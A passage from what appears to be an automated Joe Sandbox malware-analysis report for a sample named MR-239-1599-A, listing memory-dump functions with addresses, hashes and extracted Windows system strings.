                                                                                                                                                                                                          • Instruction ID: e8ef281678ef9217eba59f33cfec8eee21e9d981230836ada6a7ee94ae4df746
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68aa83c4959b96fc0a8f970e875d920e2cfa6426488b7bc62afcf521a91a8f26
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B511871E0061EAFDF11DFE9CD90AEEBBB8FB44654F10052AE615AB290D7309D06CB60
                                                                                                                                                                                                          Function 014F04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • kLsE, xrefs: 014F0540
                                                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014F063D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                          • API String ID: 0-2547482624
                                                                                                                                                                                                          • Opcode ID: 2cd14f70ba6f830e5489e027abeb91dae57495b4467a68b3c4220b7db04b2a8e
                                                                                                                                                                                                          • Instruction ID: 374ac9d79da00afacd6e6ce04d7cf99becd98574f1c8ef2c992c0a776ce50e79
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd14f70ba6f830e5489e027abeb91dae57495b4467a68b3c4220b7db04b2a8e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7151AF71504742CBD724DF69C4446A7BBE6AFC8304F10483FE6A987362E770E545CB91
                                                                                                                                                                                                          Function 014FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 014FA2FB
                                                                                                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 014FA309
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                          • API String ID: 0-2876891731
                                                                                                                                                                                                          • Opcode ID: 6b469a0a3c114e660fabd5e9af3760b143dc22dfcab8d038ad917565ea89c2e8
                                                                                                                                                                                                          • Instruction ID: 19205503eb5d6513ed2c9aef7745294a7a778541c6c2db417dd4af9e7d99c227
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b469a0a3c114e660fabd5e9af3760b143dc22dfcab8d038ad917565ea89c2e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3941BC35A00646CBDB26DF59C850B6E7BB4FF84710F2440AAEA18DF3A1E7B5D941CB41
                                                                                                                                                                                                          Function 0152A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                                                                                          • Opcode ID: ded531b8254b3559a2e1bf63d531b18d7b5d3a5e5e09a4e61a974eff3cd7cd23
                                                                                                                                                                                                          • Instruction ID: 92da81c2965bc62928da9cb3a7cf0561a93c52f7aa55fce700a973dc64d7adfe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ded531b8254b3559a2e1bf63d531b18d7b5d3a5e5e09a4e61a974eff3cd7cd23
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7012CB2A10700AFD321CF24CD09B2677E8F795B25F01883AE219CF590E334E804CB46
                                                                                                                                                                                                          Function 014FC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: MUI
                                                                                                                                                                                                          • API String ID: 0-1339004836
                                                                                                                                                                                                          • Opcode ID: f174d5dd04d4fc09a0c81f84a10e19a2475d2b09a0a4e521a78aa8c08186bc4c
                                                                                                                                                                                                          • Instruction ID: beb1a4b1fa1cb9aebf38f75b5e7abbff19b65357846dc7fdb1c8b51d1fe76d87
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f174d5dd04d4fc09a0c81f84a10e19a2475d2b09a0a4e521a78aa8c08186bc4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7824E75E002199FEB25CFA9C880BEEBBB5FF44310F14816EDA59AB3A1D7309941CB50
                                                                                                                                                                                                          Function 01576420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                                                          • Opcode ID: 9eb572afc08fbe778742546daccea0215cd2751d443602c83130e916660b8d49
                                                                                                                                                                                                          • Instruction ID: e7b3626928054443dd40d6e4bc83ebea49755908b8213edeb95b213f95b86bc9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9eb572afc08fbe778742546daccea0215cd2751d443602c83130e916660b8d49
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70914F7190061AAFEB22DB95DD85FAEBBB8FF58B50F500065F600AF194D774AD04CBA0
                                                                                                                                                                                                          Function 0159E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                                                          • Opcode ID: 0ff6010588edbd1b94b9f67ecf5cda886d5aa6b3f20e94b8b119ed92c180cd1b
                                                                                                                                                                                                          • Instruction ID: f791a02a83403067526fafe8787df3f74a54119eef11ab81008d738bb99773c7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ff6010588edbd1b94b9f67ecf5cda886d5aa6b3f20e94b8b119ed92c180cd1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B919F7290060AAEDF22EBA5DC45FAFBBB9FF85740F100025F501AF250EB74A901CB51
                                                                                                                                                                                                          Function 0152A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: GlobalTags
                                                                                                                                                                                                          • API String ID: 0-1106856819
                                                                                                                                                                                                          • Opcode ID: 14217154bf646d54bb7905c6f6b4155a4cedeaa28c16ec9310ffb374e45c7ed8
                                                                                                                                                                                                          • Instruction ID: decf4e5fceea8db3d8b174a8c9511037aa963444c51d507059b9dd81ebd1a176
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14217154bf646d54bb7905c6f6b4155a4cedeaa28c16ec9310ffb374e45c7ed8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22717CB5E0021A9FDF28CFACD5906ADBBF5BF98700F14812EE905AF241E7359941CB90
                                                                                                                                                                                                          Function 01594978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: .mui
                                                                                                                                                                                                          • API String ID: 0-1199573805
                                                                                                                                                                                                          • Opcode ID: 45602246e2805f2efb839c2f53a85a193d6595c65e97abb5f00c6ded7904a520
                                                                                                                                                                                                          • Instruction ID: cee284a9211600323790dfbeb502373fb5d6ab4a9fc84e757e542656f4e22f56
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45602246e2805f2efb839c2f53a85a193d6595c65e97abb5f00c6ded7904a520
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E951A872D002269BDF11DF99DA40AAEBBB5BF19610F05412EEA15BF350D3789C02CBE5
                                                                                                                                                                                                          Function 0150E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: EXT-
                                                                                                                                                                                                          • API String ID: 0-1948896318
                                                                                                                                                                                                          • Opcode ID: bcb3647c3de773f5617c160d9637ccfee5f4d10d5b3bf76ac916778071a7aac1
                                                                                                                                                                                                          • Instruction ID: e8cc36dc4fee1e9295eb789ad7e11cc7ae50680009b0e60dbce652303172fbe0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcb3647c3de773f5617c160d9637ccfee5f4d10d5b3bf76ac916778071a7aac1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F4181725083429BD712DAA5C941B6FB7D8FFC8614F140D2EFA84DF1D0E674D90487A2
                                                                                                                                                                                                          Function 0156C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: BinaryHash
                                                                                                                                                                                                          • API String ID: 0-2202222882
                                                                                                                                                                                                          • Opcode ID: 05b5f26ca6a23f74779fa36912d2ed9be217c3a7569134e2393593d585943dcf
                                                                                                                                                                                                          • Instruction ID: 5da32c7e012c2f3c586f26539801e2a1ec2c8649600f4c460f8c85e4c05c9681
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05b5f26ca6a23f74779fa36912d2ed9be217c3a7569134e2393593d585943dcf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 344133B2D0052EABDB21DA50CC84FDEB77CBB95714F0045A5EA48AF140DB709E898FE4
                                                                                                                                                                                                          Function 01586B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                                                          • Opcode ID: 7098fbbb230387574dd548fd19fab61d9d8082970c695ebb520b6226dd619ebd
                                                                                                                                                                                                          • Instruction ID: c8b0bd83939de515bb4487ece2c387c0eca15f228029de5d18cf5a916857ca4d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7098fbbb230387574dd548fd19fab61d9d8082970c695ebb520b6226dd619ebd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC310631A0071A9BEB22EB69C854BAEBBA8FF44704F144068E951BF282D775D805CB50
                                                                                                                                                                                                          Function 0156CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: BinaryName
                                                                                                                                                                                                          • API String ID: 0-215506332
                                                                                                                                                                                                          • Opcode ID: 09dd54c3ab79f6ab84c387d778c22883faa92ca9a290ecca9137878ba4c773e1
                                                                                                                                                                                                          • Instruction ID: 70de981af6042f1be59b6e16b32aa0e987278a82b0d1bca86f3faf580ffa423c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09dd54c3ab79f6ab84c387d778c22883faa92ca9a290ecca9137878ba4c773e1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4131E536900516AFEB16DA59C855E7FBBB8FF80710F414169A945AF260D7309E04DBE0
                                                                                                                                                                                                          Function 0157892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0157895E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                          • API String ID: 0-702105204
                                                                                                                                                                                                          • Opcode ID: 2f25717cf13bc246f1c8d3376d63773666bb103d0cf8dbc2346b05d97327ae06
                                                                                                                                                                                                          • Instruction ID: cda630b01991449d4d339b985a97e5a04b8834c8c704eb05bfc273ce1962e565
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f25717cf13bc246f1c8d3376d63773666bb103d0cf8dbc2346b05d97327ae06
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66012B36710202ABE6296F56FC8EE5A7BE5FFD1268F04041DF6411E561CB30AC44C7A3
                                                                                                                                                                                                          Function 01592000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 28066dc8c346c979320a613d322231161b36bee462f09148479f5a7b12dcc99d
                                                                                                                                                                                                          • Instruction ID: cc483e131a3a23974cc21ecd39bb37bc57a2e0248b86080fbe8f823c5a5b0a01
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28066dc8c346c979320a613d322231161b36bee462f09148479f5a7b12dcc99d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45428075608342ABDB25CF68C890A6FBBE5BB88340F48492DFA869F250D771D845CB53
                                                                                                                                                                                                          Function 01588158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2415fd35c89c2ad6891a7f8fc1a566bf760eb3cf7bd616bfba5980c4be120ad2
                                                                                                                                                                                                          • Instruction ID: 15e80df64e6620be00f7100d558a8dc0eaa7499a6c5acb0468b5f4cb9d0092e9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2415fd35c89c2ad6891a7f8fc1a566bf760eb3cf7bd616bfba5980c4be120ad2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5428D75E102198FEB25DF69C881BADBBF5FF88304F548099E949EB242DB349981CF50
                                                                                                                                                                                                          Function 01502840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a2b321f5ec8871d63a699744e3ee2acea872dd17ad45dfd3bd30f42b0c6f1fd2
                                                                                                                                                                                                          • Instruction ID: 07162c28de241de2af182b5e96e78bb26f7f3fe78dc41caa2c6d19769db3fc24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b321f5ec8871d63a699744e3ee2acea872dd17ad45dfd3bd30f42b0c6f1fd2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11321270A007968FEB65CFA9C8647BEBBF2BF84304F94451ED9869F284D735A841CB50
                                                                                                                                                                                                          Function 0159A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d11d70d0cb756411dc087c100bf77e428f66aacdcf26d3ec287b04fe44a38ab3
                                                                                                                                                                                                          • Instruction ID: e8493997563e162146b10c09fd8d9e2d810ca79560321f709716550e1e69411c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d11d70d0cb756411dc087c100bf77e428f66aacdcf26d3ec287b04fe44a38ab3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0022D0706046618BEF25CF2DC09437ABBF1BF44304F08889AD9968F286E735E452DB72
                                                                                                                                                                                                          Function 014F6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 89560b92b12cbd7b53c432416d4365d6fcb14b7eff7a3fa303fb1a68995f22d1
                                                                                                                                                                                                          • Instruction ID: 9e336df31b088dd6d048302eb73c6e6f36ef6f414b03141b187bc98df8193b2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89560b92b12cbd7b53c432416d4365d6fcb14b7eff7a3fa303fb1a68995f22d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C328C71A00615CFDB25CFA8C490BAEBBF1FF48310F15856EEA56AB3A1D734A841CB50
                                                                                                                                                                                                          Function 01514A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                          • Instruction ID: 6f4b88b1c271289f885205fe001c81d645ae1a421127a410ef8be76f6134ee1a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF18171E0021A9BEF16CFA9C594BAEBBF6BF44714F049529E901AF344E734D841CB60
                                                                                                                                                                                                          Function 0158892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5fc779675aa6edeeb2560ae275e0b6773c8e69e04b153c43e9554cbf6df6a5ed
                                                                                                                                                                                                          • Instruction ID: 8b3c7ac85bd7c0ef7cdaefa319f6676327545bdecbf2436ecc1f1453434b9002
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fc779675aa6edeeb2560ae275e0b6773c8e69e04b153c43e9554cbf6df6a5ed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D1F071A0060A8BDF15DFA8C841AFEB7F1FF88314F988169D955BB281E735E905CB60
                                                                                                                                                                                                          Function 014F65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ac29048a768108c11df6fe52f08d1f6871a5472744f804d5a4681989ad85a257
                                                                                                                                                                                                          • Instruction ID: b7ff00d34bc00e94bf7f2a2156934f2cb66b8b1cb14406864687db7be6c4a176
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac29048a768108c11df6fe52f08d1f6871a5472744f804d5a4681989ad85a257
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE19071508342CFC715CF28C490A6BBBE1FF89314F06896EEA998B361D731E905CB92
                                                                                                                                                                                                          Function 014E8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 55948ecdde777a8b59fe89fec5eefe1e741ca7216864baffaca80ce28ac9d0c3
                                                                                                                                                                                                          • Instruction ID: 3aad7c09e899679fb4993cf36b1fd4347783e124e0e57bfbf611a31911113cf5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55948ecdde777a8b59fe89fec5eefe1e741ca7216864baffaca80ce28ac9d0c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8D1CF71A002079BDF14DF69C884ABEB7E5FF64209F15462EE916DB2A0FB30D951CB60
                                                                                                                                                                                                          Function 01578243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                          • Instruction ID: 13af8ed064fd20a2dc26b574a1b12e5d190d18917c3a14dfa192d7265c560d7a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDB19375A00605AFDF24DF99D949EAFBBB9FF84304F10446DAA029B790DB34E905CB10
                                                                                                                                                                                                          Function 01500535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
